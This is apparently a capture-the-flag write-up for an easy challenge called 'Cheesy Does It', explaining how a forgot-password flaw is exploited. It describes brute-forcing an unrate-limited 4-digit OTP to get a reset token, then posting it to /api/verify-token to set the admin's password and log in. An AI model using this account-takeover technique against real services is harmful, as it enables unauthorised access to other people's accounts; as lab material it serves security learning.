Cheesy Does It (forgot_password flaw)

Level: Easy Points: 10 Type: Daily Challenge

During register/login we can see forgot password feature.

Forgot-password takes only one arguement i.e username , we can pass any username here.

Once username is passed, OTP is sent to account's email address. The ui doesnot takes the value more than 4 digit. Meaning we can try to bruteforce the OTP.

There is no any rate limiting system and we can successfully bruteforce the OTP. After successfull OTP bruteforce, we get the reset_token

From the js file,we can get idea on how to use the reset_token to change the password.

POST request to /api/verify-token with values of

• username

• reset_token

• new_password

Password successfully changed.

Now, we can login as admin and get the flag.